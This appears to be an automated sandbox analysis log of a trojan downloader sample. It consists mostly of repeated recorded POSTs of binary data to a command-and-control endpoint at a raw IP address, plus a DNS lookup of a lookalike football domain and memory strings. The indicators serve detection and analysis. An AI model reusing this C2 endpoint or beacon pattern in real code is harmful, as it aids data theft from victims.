                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 165Connection: close
                Source: unknownHTTPS traffic detected: 172.67.197.219:443 -> 192.168.2.5:49692 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: unknownTCP traffic detected without corresponding DNS query: 87.251.79.157
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exeCode function: 5_2_00404ED4 recv,
                Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-0E44846E8DBE171CF83840F8DBF160DC.html HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: liverpooldabestteamoftheworld.comConnection: Keep-Alive
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.facebook.com (Facebook)
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.twitter.com (Twitter)
                Source: unknownDNS traffic detected: queries for: liverpooldabestteamoftheworld.com
                Source: unknownHTTP traffic detected: POST /m0ha/0/pin.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 87.251.79.157Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 6DBE4C7CContent-Length: 192Connection: close
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000002.513547746.0000000000E08000.00000004.00000020.sdmpString found in binary or memory: http://87.251.79.157/m0ha/0/pin.php
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000002.513547746.0000000000E08000.00000004.00000020.sdmpString found in binary or memory: http://87.251.79.157/m0ha/0/pin.phpP
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299266611.0000000003170000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299266611.0000000003170000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299266611.0000000003170000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299142713.0000000003121000.00000004.00000001.sdmpString found in binary or memory: http://liverpooldabestteamoftheworld.com
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299142713.0000000003121000.00000004.00000001.sdmpString found in binary or memory: http://liverpooldabestteamoftheworld.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299266611.0000000003170000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: WerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
                Source: WerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
                Source: WerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
                Source: WerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
                Source: WerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
                Source: WerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
                Source: WerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299142713.0000000003121000.00000004.00000001.sdmp, WerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: WerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
                Source: WerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
                Source: WerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
                Source: WerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
                Source: WerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
                Source: WerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
                Source: WerFault.exe, 00000008.00000003.281156001.00000000058F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299266611.0000000003170000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0v
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://felix.data.tm-awx.com/felix.min.js
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s220b/0_Salah-Pressing.jpg
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpg
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837
                Source: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe, 00000000.00000002.299483958.00000000031D0000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837
